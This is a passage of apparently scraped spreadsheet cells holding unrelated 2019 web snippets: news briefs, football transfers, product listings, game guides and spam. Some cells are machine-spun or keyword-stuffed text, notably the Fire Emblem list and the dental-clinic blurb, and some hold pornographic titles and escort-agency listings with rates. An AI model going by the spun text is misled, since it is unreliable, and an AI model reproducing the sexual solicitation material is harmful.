them lost items or gifts, eat with them or help them in their side quests. In battle, the characters reinforce their support by fighting next to each other. This rank also increases your combat skill as a team and deepens your personal relationship. As shown on this page, some characters belong exclusively to one of the three incumbent houses of the game. In this case, you will probably be able to make the effort to seduce them only if they are at home. However, most characters can be assigned to your home based on their recruiting needs. Therefore, if you have a love target outside your home, you will want to recruit him first. Here is a complete list of the S-brackets of the fire emblem: three houses – and, as such, a list of all the romantic characters. Fire Emblem Three Houses: harmonious character and rank S support list Here is the maximum support that Byleth can achieve in Fire Emblem: Three Houses. Character Male support grade Byleth Max Female support rank Byleth Max Alois S (platonic only) S (platonic only) Annette S A Ashe A S Bernadetta S A Casper A S Catherine S A Claude A S (deer only) Cyril A S Dedue A S (Blue Lions only) Dimitri A S (Blue Lions only) Dorothea S S Edelgard S (Black Eagles only) S (Black Eagles only) Félix A S Ferdinand A S Flayn S A Gilbert S (platonic only) S (platonic only) Hanneman A S Hilda S (deer only) A Hubert A S (Black Eagles only) Ignatz A S Ingrid S A Leonie S A Linhardt S S Lorenz A S Lysithée S A Manuela S A Marianne S A Mercedes S S Petra S A Shamir S A Seteth A S So that A A silvan A S Raphael A S Rhea S S Post Fire Emblem: Three Houses Novelistic Support Ranks: Each rank S for the listed novels first appeared on VG247.</t>
  </si>
  <si>
    <t>An SAS soldier who died while fighting Islamic State in Syria last year was killed in an accident and not in a roadside bomb, an investigation has found. Read more? Click here</t>
  </si>
  <si>
    <t>The motion also calls for the immediate release of Kovrig and Spavor and for "due process" in the case of a third Canadian, Robert Schellenberg, who had a previous prison sentence for drug smuggling upgraded to death earlier this year.</t>
  </si>
  <si>
    <t>THREE Mobile has just revealed its pricing for 5G and customers will get these faster speeds without having to pay any extra. Daily Express :: Tech Feed Three Mobile is offering customers something EE and Vodafone can’t match</t>
  </si>
  <si>
    <t>Australian sports fans frustrated over poor officiating have few options for redress — but in the US, a fan-led lawsuit over a blown call has won the right to put the NFL's commissioner on the stand.</t>
  </si>
  <si>
    <t>Sarah N. Lynch</t>
  </si>
  <si>
    <t>The US Justice Department has reinstated the death penalty, which has not been used for 15 years, with a white supremacist among the first five to be executed.</t>
  </si>
  <si>
    <t>My Kinks: I like people exploring their sexuality and are no Webcam profile: I can be nasty when u want me. Try to set me on fire and you will be there with me! Favourite sex position: all What I do in my amateur show: oral sex What I don’t like: dirt Gallery</t>
  </si>
  <si>
    <t>Brexit fears and slow global growth have hit output in manufacturing sectorA double whammy of Brexit uncertainty and a slowdown in global trade has seen order books in Britain’s factories shrink at their fastest pace since the financial crisis, the CBI has said.Urging the new prime minister, confirmed on Tuesday as Boris Johnson, to strike a deal with the EU, the employers’ organisation said industrial output also fell in the latest quarter, for the first time since the spring of 2016. Continue reading… Read More</t>
  </si>
  <si>
    <t>Transfer Round-Up: West Ham, Fulham and Birmingham City DAGENHAM, ENGLAND – MARCH 11: Marcus Browne of West Ham in action during the Premier League 2 match between West Ham and Chelsea FC at Chigwell Construction Stadium on March 11, 2018 in Dagenham, England. (Photo by Arfa Griffiths/West Ham FC via Getty Images) Welcome back to Footy News’s Transfer Round-Up, where we bring you all of the day’s done deals across the country. Today, we take a closer look at a West Ham youngster moving away from the club, Fulham loaning out one of their big-money signings, and Birmingham City’s capture of an international captain. Transfer Round-Up Browne Moves On Championship side Middlesbrough have signed 21-year-old Marcus Browne for an undisclosed fee from West Ham. He becomes manager Jonathan Woodgate’s second signing of the summer and the first outfield player to sign after goalkeeper Tomas Mejias rejoined the club. Browne spent last season on loan at League One outfit Oxford United, where he scored nine goals and provided five assists in 44 appearances. Welcome to #Boro, @MarcusBrowne14! #UTB — Middlesbrough FC (@Boro) July 26, 2019 Fulham Loan Out Anguissa One of Fulham’s big-money signings from last season, Andre-Frank Zambo Anguissa, has completed a season-long loan move to La Liga side Villarreal. The Spanish side will have the option of making the deal permanent at the end of the 2019/20 season. The Cottagers signed Anguissa for a reported £22.3 million at the start of last season from Marseille. Good luck at @VillarrealCF, Frank — Fulham Football Club (@FulhamFC) July 26, 2019 Birmingham Sign Croatia Youth Captain Birmingham City have signed Croatia U21 captain Ivan Sunjic for an undisclosed fee from Dinamo Zagreb. Sunjic has signed a five-year deal in the Second City and is considered to be one of Croatia’s rising stars. The deal is subject to international clearance and, as such, he will not feature in the Blues’ friendly against Brighton &amp; Hove Albion on Saturday. Other Deals Victor Adeboyejo [Barnsley – Bristol Rovers] Loan Luke Armstrong [Middlesbrough – Salford City] Undisclosed Seny Dieng [Queens Park Rangers – Doncaster Rovers] Loan Rory Holden [Bristol City – Walsall] Loan James Husband [Norwich City – Blackpool] Loan Alex Jakubiak [Watford – Gillingham] Loan Zak Jules [Macclesfield Town – Walsall] Undisclosed Gary Liddle [Carlisle United – Walsall] Free Jordan Lyden [Aston Villa – Swindon Town] Free Sean McLoughlin [Cork City – Hull City] Undisclosed Callum Reilly [Gillingham – AFC Wimbledon] Free Scott Wharton [Blackburn Rovers – Northampton Town] Loan This post Transfer Round-Up: West Ham United, Fulham and Birmingham City appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Guests this week on Have You Been Paying Attention? are Amanda Keller, Mick Molloy and Kitty Flanagan. Quizmaster Tom Gleisner and our line-up of fast and funny comedians will bring you up to speed on everything you missed in the world of international affairs, pop culture, sport and celebrity gossip. Back Monday night for a hilarious take on some very serious subjects are series regulars Ed Kavalee and Sam Pang. Boasting their news knowledge alongside Ed and Sam is the host of The Living Room Amanda Keller and comedian, writer, actor triple-threats Mick Molloy and Kitty Flanagan. Monday, 29 July at 9.00pm.</t>
  </si>
  <si>
    <t>This is a Philips Master PL-C 26w compact fluorescent lamp in colour 835 – white. This lamp has a G24d-3 cap. These lamps have an average lamp life of 10,000 hours and are often used in public buildings, offices, shops, supermarkets, hotels, restaurants and around the home. Manufacturers Part No (where applicable) : 866509 This Philips product is available for just £1.55 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>Comic to start shooting Covers in LA</t>
  </si>
  <si>
    <t>Anwenx</t>
  </si>
  <si>
    <t>Playing Music in Car via Bluetooth, TF Card and USB Disk. Don't forget to apply code OZHMP03 at Checkout. If you want the version with extension cigarrete lighter port, you can see this one: Baseus Car Bluetooth FM Transmitter 5V 3.4A Dual USB Phone Charger AU$13.95 after code OZHMP05 Baseus FM Transmitter Bluetooth MP3 Player Dual USB Car Charger S-09A Detail as Follows: Brand Name: BASEUS Output Interface: 12V/2A USB Ports: 2 Quality Certification: RoHS, ce, FCC, CCC Model Number: S-09A Support Quick Charge Technology: No Power Source: Car Lighter Slot Input: 12-24V/2.4A Type: FM Transmitter , Car MP3 Player Bluetooth version: Bluetooth 4.2 USB Charger output: Dual USB 5V3.4A (Max) in Total FM Transmitter: 87.5-108MHz Support: TF card / U disk capacity up to 32G Supported Audio File Types: MP3, WMA, APE, FLAC, WAV and Other Hi-fi Formats Bluetooth Distance: 5-10M</t>
  </si>
  <si>
    <t>Josh Zimmerman and Peter de Kruijff</t>
  </si>
  <si>
    <t>The Geraldton MLA has opened up about his reason for jumping ship from the WA Liberal Party.</t>
  </si>
  <si>
    <t>Arabic Belarus Dictionary – travel dictionary to translate Arabic to Belarus. Click on the list to show Arabic or Belarus synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Belarus Dictionary →</t>
  </si>
  <si>
    <t>The maker of Tim Tams, Iced Vovos and Shapes is set to be acquired in a $3 billion deal.</t>
  </si>
  <si>
    <t>Episode 7: ‘Connecting the World’ Producer/Director Rolake Bamgbose A lonely Florida woman established a Facebook romance with a man she thought was an American soldier in Iraq. It wasn’t until she had sent him tens of thousands of dollars from her and her husband’s life savings that she learned her buff, blue-eyed friend was a fake. Online scams may be as old as the internet, but Facebook has made it easier for scammers to victimize users longing for connection, and to draft unwitting U.S. service members into their schemes. Neither the world’s largest social network nor the world’s most powerful military seem to be able to stop it. In a special one-hour episode of “The Weekly,” our technology reporter Jack Nicas tries to track down some of these digital con artists. [Join the conversation about @theweekly on Twitter and Instagram. #TheWeeklyNYT] Featured Reporter Complete Coverage Directors of Photography Adam Beckman and Victor Tadashi Suarez Video Editor David Herr Senior Story Editors Dan Barry, Liz O. Baylen, and Liz Day Producer Lizzie Blenk Associate Producer Brennan Cusack Source link</t>
  </si>
  <si>
    <t>Everton defender Yerry Mina has been charged with misconduct in relation to a breach of the Football Association's betting regulations.</t>
  </si>
  <si>
    <t>An apparent trailer of a Russian drama about the Chernobyl disaster, featuring a CIA plot, has been deleted from YouTube following negative reaction. What appears to be a preview of the programme, which like its US equivalent is also simply called Chernobyl, was not released through any official channels. However, it doesn’t seem to be attracting the same levels of acclaim as the HBO show.</t>
  </si>
  <si>
    <t>Ronald Chan | Chief Operations Officer | Finbar Group Limited</t>
  </si>
  <si>
    <t>When new urban infill development is contemplated by state or local government planners and then carried out by private developers, one of the key issues usually raised by the local community is the perceived increase in traffic and the expected impact of more cars on the road.</t>
  </si>
  <si>
    <t>Manchester United are on the verge of sealing a mega double swoop for Bruno Fernandes and Harry Maguire following a breakthrough in negotiations</t>
  </si>
  <si>
    <t>This is a triple 30w switch start, complete gear tray to run 3 x 30w 3ft T8 Fluorescent Tube. This gear tray comes complete with switch start choke, starter, capacitor, T8 mounting clips, lamp leads and lamp holders. All our gear trays are supplied using branded chokes and are 100% tested before we send them out. Manufacturers Part No (where applicable) : GTT330HPF This LampShopOnline product is available for just £37.94 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>The 2.5km Woolloongabba bikeway has been opened, connecting cyclists through the city.</t>
  </si>
  <si>
    <t>The following is a statement from Faruk Orman on his release on Friday after spending 12 years in prison.</t>
  </si>
  <si>
    <t>It took illustrator Sanna Dyker almost two weeks to bring her unique design for an Oor Wullie sculpture to life.</t>
  </si>
  <si>
    <t>Danny Seymour</t>
  </si>
  <si>
    <t>The man widely regarded as one of the founding fathers of the B.C wine industry has died.</t>
  </si>
  <si>
    <t>The male black-tailed dusky antechinus, discovered in 2014 on the Gold Coast hinterland, drops dead after an intense and stressful mating session.</t>
  </si>
  <si>
    <t>Fortnite will be two years old this summer and you will have some special celebration challenges. Alongside the new Challenges of overtimethey are four Fortified birthday challenges for you to complete. You will get a birthday themed reward for each challenge, such as a wrap or a new soundtrack. If you manage to meet all four challenges, you will receive a special pick for your birthday cake. Save the World also has a new hero, Birthday Brigade Jonesy, and a special mission to celebrate. Fortified birthday challenges The anniversary challenges will be available from July 25th to 31st. Here are the ones we know so far: Play 10 games (0/10) Dance in front of different birthday cakes (0/10) Exceed the opponents (0/500) Earn health points or shields with birthday cakes (0/50) Fortnite Season 9 Weekly Challenges Here is where you can find all Fortbyte locations. Week 10 Challenges Visit various public service announcement boards Week 9 Challenges Visit a solar panel in the snow, desert and jungle Week 8 Challenges Visit different clocks Week 7 Challenges Looking for a safe, using a vending machine and a campfire in one part Week 6 Challenges Safes looking in a hot spot Week 5 Challenges Race venues Visit the celestial platforms Week 4 Challenges Dance inside a holographic tomato head Week 3 Challenges All Slipstream locations Week 2 Challenges Visit an oversized phone, a giant piano and a dancing fish Week 1 Challenges Visit the celestial platforms The Post Fortnite: Birthday Challenges first appeared on VG247.</t>
  </si>
  <si>
    <t>Hong Kong police have fired tear gas and swung batons at protesters who defied authorities' warnings not to march in a neighbourhood where a mob brutally attacked people in a train station.</t>
  </si>
  <si>
    <t>andrewmelder</t>
  </si>
  <si>
    <t>Big discount on noise cancelling in ear Sony headphones. Not into neckband type headphones after trying some others but this deal seems too good not to share.</t>
  </si>
  <si>
    <t>Akamai Technologies Inc beat analysts' estimates for second-quarter revenue on Tuesday, boosted by strong demand for its cloud security services and growth in its traditional business of speeding up media content delivery through the web.</t>
  </si>
  <si>
    <t>With banks increasingly competing through their digital offerings, CBA wants to play a more active role in how people manage their money.</t>
  </si>
  <si>
    <t>West Coast ruckman Nic Naitanui says he still has a glimmer of hope of playing again this season, and has vowed to do everything he can to avoid surgery.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/P7VGTLAkyWU/mangrove-capitals-roy-saar-the-european-tech-scene-has-matured-2019-7 One of the first backers of Skype and Wix.com explains why the European startup scene is starting to close the gap with Silicon Valley Europe has long been considered a backwater for tech, particularly for tech startups, but that’s no longer the case, said Roy Saar, a partner with Mangrove Capital Partners. The tech scene in Europe and Israel is thriving, and a growing number of startups are reaching valuations of $1 billion or more. Europe now has lots of tech talent, growing amounts of venture investing, and a business environment that’s more conducive to startups, Saar said. While it’s not yet ready to take on America’s tech giants, some of its companies may have a distinct advantage over their US rivals, he said. Click here for more BI Prime stories. When it comes to fostering tech startups, Europe doesn’t have anything close to Silicon Valley’s track record or reputation. But the the Old World and the New may not be as far apart anymore as people might assume. Money is flowing into European and Israeli startups, the business environment has become more amenable to entrepreneurship, and there’s more tech talent there than ever before, said Roy Saar, a partner with Mangrove Capital Partners, a venture firm that focuses on that part of the world. A European rival to tech giants such as Amazon or Alphabet is still a long way off, but Europe is already home to a significant and growing number of unicorns, startups worth more than $1 billion, he said. “We see the gap” between Europe and Silicon Valley “closing and closing fast,” Saar told Business Insider in a recent interview. “But it’s still a big gap.” Saar has seen first-hand how the tech scene in Europe and Israel has been developing. His firm, Mangrove Capital Partners, was an early backer of Skype, the Luxembourg-based online communications company that was acquired by eBay and then by Microsoft. It later invested in Israel-based Wix, which offers a web development service; it went public in 2013 and is now worth $7.4 billion. More recently, Mangrove backed WalkMe, a newly minted unicorn startup founded by Israeli entrepreneurs that helps companies train their employees to use new software. Mangrove invests about one-third to one-half of its money in Israeli startups, with the rest of its investments being placed across Europe. One of the firm’s latest deals was a $14.5 million early-stage investment it announced earlier this month in Lightico, a startup based in Tel Aviv, Israel, that helps clients distribute legal forms and collect electronic signatures from customers via their mobile devices. Europe is amassing tech talent A combination of factors is helping Europe’s startup ecosystem mature and develop, Saar said. In particular, there are very good technical schools, particularly in Eastern Europe, that are training students in the skills they need for the latest jobs in the industry, he said. Graduates of those schools are well prepared to work on projects involving artificial intelligence and computer vision, among other things. What’s more, people who have worked for the European or Israeli offices of big American tech companies, including Apple, Microsoft, Google, and Facebook, are leaving to join or found startups in those areas, he said. As they do, they’re bringing America’s tech culture with them to their new companies, he said. “They will do what we call the localization of that culture to their local market,” he said. Read this: Intel invests as much as $500 million in startups each year. Here’s what it’s looking for in new investments, according to one of its top VCs. Meanwhile, it’s becoming easier for founders to do the basic things needed to get a new business off the ground, such as registering the company and setting up a corporate bank account, he said. “We see the … corporate environment being more tolerant toward starting a new business,” he said. Some European startups may be better at going international That said, Europe is unlikely to produce the next trillion dollar tech company, according to Saar. The startup ecosystem there needs develop further before it will be able to produce a company to rival America’s tech giants. But the region’s already producing more and more billion dollar ones. And startups that come out of particular countries there may end up having a leg up on American rivals when competing for business overseas. US startups — and even those in bigger European countries such as Germany and France — frequently wait years before branching out from their home markets, because those markets are so large and the challenges of going international can be so daunting, Saar said. But newly formed companies in small nations such as Israel and Portugal often set up shop in other markets in their earliest days because their home markets are too small to offer much potential. “I think the early-stage startups coming out from smaller countries would be a bit more sophisticated and more open for internationalization versus the American startups,” he said. Read more about startups and venture capital: Beyond Meat, whose plant burgers can fool even die-hard meat lovers, is up 700% since its IPO. Early investors say it will change how we eat, but there are signs Wall Street’s binge could end badly. Here’s the pitch deck that convinced investors to pour $6 million into a startup trying to take on Slack and Asana despite entering the market years late Lots of extremely successful founders in Silicon Valley cash out early. But WeWork’s CEO pocketing $700 million is still far from normal. This startup just got $17 million to take on Peloton. Here’s why its founder thinks there’s a big opportunity in the home fitness market. SEE ALSO: Here’s the pitch deck a Montreal startup used to raise $2 million to get the word out about its AI-powered chatbot after funding it themselves for two years Join the conversation about this story » NOW WATCH: 5 things wrong with Apple’s lightning cable Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/P7VGTLAkyWU/mangrove-capitals-roy-saar-the-european-tech-scene-has-matured-2019-7 The post One of the first backers of Skype and Wix.com explains why the European startup scene is starting to close the gap with Silicon Valley appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>/u/Chrissanthee</t>
  </si>
  <si>
    <t>submitted by /u/Chrissanthee [link] [comments] The post Shared wife – Hard Spanked ass! she screams in pain ! appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>submitted by /u/gulabjamunyaar [link] [comments] Everything we know about the iPhone 11: Smart Frame, Taptic Engine details, more</t>
  </si>
  <si>
    <t>Anthony Knockaert Joins Fulham From Brighton &amp; Hove Albion BRIGHTON, ENGLAND – MAY 12: Anthony Knockaert of Brighton and Hove Albion celebrates after his team’s first goal during the Premier League match between Brighton &amp; Hove Albion and Manchester City at American Express Community Stadium on May 12, 2019 in Brighton, United Kingdom. (Photo by Shaun Botterill/Getty Images) Championship side Fulham have completed the signing of Brighton &amp; Hove Albion winger Anthony Knockaert. The Frenchman joins the Cottagers on an initial one-year loan with a view to a permanent transfer next season. According to BBC Sport, the fee agreed will remain undisclosed and is likely to go through next summer. Anthony Knockaert Signs For Fulham From Brighton &amp; Hove Albion Welcome to Fulham, Anthony Knockaert! #TOTALKNOCKAERT — Fulham Football Club (@FulhamFC) July 21, 2019 Relegation Recovery Fulham’s expenditure was well documented last season as they aimed to build a squad capable of Premier League survival. What they did instead, though, was rip apart the team that had got them to that point and replaced them with players that, while good enough on paper, didn’t have the ability to play together. It resulted in them having their relegation confirmed as early as April 2, just three days after Huddersfield Town Town, who finished the campaign on 16 points – only five more than Derby County’s record-lowest total of 11. This time around though, Knockaert is one of just three players (Ivan Cavaleiro’s loan arrival from Wolverhampton Wanderers and Martell Taylor-Crossdale’s free transfer from Chelsea are the others) to arrive at Craven Cottage. With less than two weeks to go until the Football League season kicks off, it’s a far cry from the Fulham of one year ago. There’s every chance that with a player of Knockaert’s ability combined with the majority of the squad that secured promotion in 2017/18 can make a decent attempt this time around. What They Said Speaking to Fulham’s official website, Knockaert said: “It feels amazing to be here. I feel really welcome already. It just feels great to get this done and for me to be a Fulham player. “I can’t wait to get started and obviously help the club achieve its goal. “The goal is to get back to the Premier League where Fulham belongs. I have come here with the clear intention to get promoted and I want to help in any way that I can.” This post Anthony Knockaert Joins Fulham From Brighton &amp; Hove Albion appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Four high school students are charged with assaulting two women who refused to kiss on a night bus in London and were left beaten and bloodied in an alleged homophobic attack.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Lakeland, Florida Consumer Credit Counseling Service | (888) 551-1270 Friday 26 July 2019 11:23 AM UTC-05 | Tags: lakeland-florida-consumer-credit-counseling-service-888-551-1270 https://youtu.be/GA76Jxg9hjc Lakeland, Florida Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Lakeland, Florida Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Lakeland, Florida Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Lakeland, Florida individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCjlZ1Dym0_rvqDY3EiBiNvg/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151303898587471873 Tags: lakeland-florida-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Two strong people to move a Cardboard box containing a pantry indoors and then remove the cardboard, and then move the pantry upright into the dining room. It is a box 84″ x 18″ x 25″ weighing in at about 130 lb, containing an assembled pantry cabinet. You will need to be able to lift .. Read more</t>
  </si>
  <si>
    <t>Don Mitchell</t>
  </si>
  <si>
    <t>Areas around Sunninghill, Sherwood, Huntington, and Hampton Heights are hot as the sales-to-new-listings ratio increase.</t>
  </si>
  <si>
    <t>Occas</t>
  </si>
  <si>
    <t>They also had the big Ferrero Rocher 30 pack down to $5.60 from $20, Celebrations down to $2.50 from $10 and plain milk Lindt tray I think around $6 down from $20?</t>
  </si>
  <si>
    <t>S. Koreans among world's biggest spenders on vacations, now turning back on Japan The post S. Koreans among world's biggest spenders on vacations, now turning back on Japan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>GALAXY S10 could be eclipsed when Samsung unveils its next flagship phablet, the Galaxy Note 10, and here’s why. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>A plunge in global bond yields is prompting banks to slash interest rates on fixed-rate loans more aggressively than their variable rates.</t>
  </si>
  <si>
    <t>Senior Labor sources indicated there have been concerns around parliament relating to Mr Fowles' struggle with alcohol abuse since he was elected in November 2018.</t>
  </si>
  <si>
    <t>Ed Spencer</t>
  </si>
  <si>
    <t>Sergio Pérez took responsibility for his second lap retirement at the German Grand Prix and apologised to his Racing Point F1 Team team after he spun out in tricky conditions. “First of all, I need to apologise to my team because I made a mistake.” said Pérez. I’ve thrown away a great opportunity today to score big points for the team. The first rule in these conditions is not to make a mistake and I did. “I was picking up the power and then had some aquaplaning on the rear. I lost it and just couldn’t recover from it. I put my hands up for it – I’m extremely disappointed with myself” Pérez like many who dropped out of the race watched the rest of it from the Racing Point garage, with his Racing Point teammate Lance Stroll scoring fourth place after an inspired strategy call. The Mexican was one of the first to congratulate the much-maligned Canadian who achieved Racing Point best result in F1 to date. ”Watching the race from the garage is always tough, but I’m happy that Lance had such a great race. We needed those points and it’s a boost for everyone”. With his first retirement of the season, Pérez sees him tumble down the driver’s standings to sixteenth and four places behind Stroll as the circus heads to Hungaroring, where Pérez hopes to repay Racing Point for his mistake at a track where his best finish has been in eighth in 2017. ”I think we’ve definitely taken a step forward this weekend. Now we look forward to Hungary where hopefully we can come back stronger.’‘</t>
  </si>
  <si>
    <t>Latinos en Alberta</t>
  </si>
  <si>
    <t>sábado de 10:00 a 16:00 Eau Claire Market 200 Barclay Parade SW, Calgary T2P 4R5 BOLETOS “The social event of the year for dogs and their people!” This free and pet friendly festival is not one to be missed! . Events Including: *Yoga With Adoptable Puppies *RUFF MUDD – YYC’s first ever mud run with your dog! *Dinner En’ Dogge *Running Of The Bulls *The Puppy Stampede *Wiener Dog Races *Photo Booths *Over 120 of the leading pet related exhibitors . THE LATEST CENSUS SHOWS THAT 1 IN 10 CALGARY RESIDENTS OWNS AT LEAST 1 DOG, AND THEY WILL ALL BE AT PET-A-PALOOZA THIS SUMMER! THE WEST COASTS LARGEST PET FESTIVAL TAKES OVER EAU CLAIRE ON JULY 27TH &amp; 28TH FROM 10:00-4:00 on SATURDAY AND 11:00-4:00 ON SUNDAY Pet-A-Palooza is presented by: Sleep Rover Doggie Hotel &amp; Daycare and Paul Ackerman Realtor and Sponsored by: Cultured Canines Montgomery Village Veterinary Clinic &amp; Dekens Housecall Services Eau Claire Market Natural Balance Pet Foods Poooh Busters Sexy Beast Dating Ez-Clean The post July 27 y 28 Pet-A-Palooza Calgary appeared first on Latinos en Alberta.</t>
  </si>
  <si>
    <t>🔔 Follow us for regular uploads: http://bit.ly/SubscribeToCircus 🎵 Buy / Stream: https://fanlink.to/DistantPlanets 🎧 Our latest releases on Spotify: http://bit.ly/CircusPlaylistSP 💽 Check out our Circus Mixtape playlist: http://bit.ly/CircusMixtapeYT ➡️Follow DMVU: Facebook: http://bit.ly/FBDMVU Twitter: http://bit.ly/DMVUTW Soundcloud: http://bit.ly/DMVU-SC Instagram: http://bit.ly/DMVUInsta ➡️Follow Flux Pavilion: Facebook: http://bit.ly/FluxPFacebook Twitter: http://bit.ly/FluxPTwitter Soundcloud: http://bit.ly/FluxPSoundCloud Instagram: http://bit.ly/FluxPInstagram ➡️ Follow Circus: Facebook: http://bit.ly/CircusFbook Instagram: http://bit.ly/CircusInstagram […] The post Circus Mixtape Vol 27 – Flux Pavilion &amp; DMVU appeared first on Dubster.</t>
  </si>
  <si>
    <t>Kris Meeke says the Toyota Yaris WRC he will drive on this weekend’s Rally Finland “feels incredible on those roads.” Meeke makes his first appearance in Finland for the Japanese manufacturer since his move from Citroen at the beginning of 2019 and the 2016 winner of the event can’t wait for the second half of the season to get underway. Speaking earlier this week, Meeke said: “Rally Finland is definitely one of my favourite events with some special memories for me, and I’m really looking forward to taking it on with the Yaris WRC. Finland is where I got my first taste of this car, and we tested there again last week, and the car always feels incredible to drive on those roads.” “It was developed in Finland and we’ve seen in the last two years just how strong it can be on this rally. I think that everyone in the team is feeling confident about the second part of the season, and hopefully we can kick-start that with a great result in Finland. I’m going to be at a bit of a disadvantage because a lot of the route will be new for me, but I’m ready for the challenge.” The Northern Irish driver currently sits in sixth in the Drivers Standings’ after the first half of the season and so far has a best result of fourth back on Rally Argentina as he continues his first full season for the team. Rally Finland takes place this weekend with daily updates on The Checkered Flag.</t>
  </si>
  <si>
    <t>Dylan Welch</t>
  </si>
  <si>
    <t>EOS, the company behind hundreds of millions of dollars' worth of sales of a next-generation weapons system to two Arab nations, tells the Australian Stock Exchange its weapons are not being used in the increasingly controversial Yemen war.</t>
  </si>
  <si>
    <t>Two-Course Tex-Mex Meal for Two at Chiquito, Nationwide (Up to 54% Off) (Merchandising (UK)) Tex-Mex dishes await fiesta fans at over 80 locations; start with the likes of jalape±o poppers and tuck into fajitas or a burger The post Two-Course Tex-Mex Meal for Two at Chiquito, Nationwide (Up to 54% Off) (Merchandising (UK)) appeared first on 4UTODAY Online since 2004.</t>
  </si>
  <si>
    <t>Best Dental Clinic In Airdrie Alberta Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Airdrie Springs Dental, North Main Family Dental, Sonata Dental, Bayside Dental &amp; Orthodontics, Sierra Springs Dental, Kingsview Dental, Nose Creek Dental Centre, Rahul. In a slightly different approach With more than 750 offices in 40 states, Aspen Dental practices provide a wide range of general dentistry and denture-related services and offer patient-friendly programs and. [General]Teleflex. With more than 750 offices in 40 states, Aspen Dental practices provide a wide range of general dentistry and denture-related services and offer patient-friendly programs and. [General]Teleflex. AB in Public Administration. Bachelor of Health Sciences in Dentistry. Music Bachelor of Music in Music Education. Professional &amp; Technical Courses BS in Industrial Technology. Bachelor of. “I was in Grade 1. At the time, Airdrie’s population was around 10,000 and it was really big news. We were called Alberta’s friendliest city,” says Trevor, who is now in his 30s. He says. Striving to be Canada’s friendliest multi-family rentals, we pride ourselves on. Complaints are often heard from from LibCons when people-friendly governments impose workplace improvements. They prefer the. a Dentist in Airdrie AB has decided it will offering free teeth whitening and free dental consultations for new patients, and this is expected to take place July 18. Where most Dentists tend to just. General dentist in with 10 years of experience. Trust our staff to take care of your loved ones. Accepting new patients, call 403-768-3856 Call Now. Alberta couple faces scorn over photo with dead lion after U.K. tabloid makes them face of anti-hunting campaign – A couple from Alberta has unwillingly become the faces of an aggressive. The Facebook photos have since been taken down, She has also received her IV Sedation Certification from University of Alberta. Although she provides comprehensive general dentistry for the entire family,</t>
  </si>
  <si>
    <t>Kasabian – Club Foot @ Mad Cool Festival, Madrid 2018-07-12 The post Kasabian – Club Foot @ Mad Cool Festival, Madrid 2018-07-12 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Stephen Miles</t>
  </si>
  <si>
    <t>New laws will limit the scope for corporate hospitality when super funds are trying to convince employers to choose their product.</t>
  </si>
  <si>
    <t>Welcome to escorts in Bednall Head ST17, covering the whole area of Staffordshire. We have escorts serving the flats, homes and local hotels in Bednall Head and the surrounding Staffordshire areas. Bednall Head Escort Staffordshire Escort Services Bednall Head Escorts - Girls Who Know How to Fulfill You in Staffordshire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Bednall Head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Bednall Head escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Bednall Head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Bednall Head,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Larissa Location: Bednall Head (ST17 0) Nationality: Welsh Spoken Language: English, Spanish Age: 35 years old Weight: 66.4kg (146lb) (10st - 6lb) Height: 5 feet 6 inches (167.74cm) Dress Size: M Shoe Size: 42 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Hazel Breast: Natural Breast Size: J Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Bednall Head Outcall: Staffordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Larissa Escort Name: Tori Location: Bednall Head (ST17 0) Nationality: Ukrainian Spoken Language: English, Swedish Age: 22 years old Weight: 56.8kg (125lb) (8st - 13lb) Height: 6 feet 1 inches (185.45cm) Dress Size: S Shoe Size: 37 Hair Leigh: Medium-length Hair Color: Red Eye Color: Gray Breast: Silicone Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: Yes Drinking: Occasionally Availability Area: Bednall Head Outcall: Staffordshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Tori Escort Name: 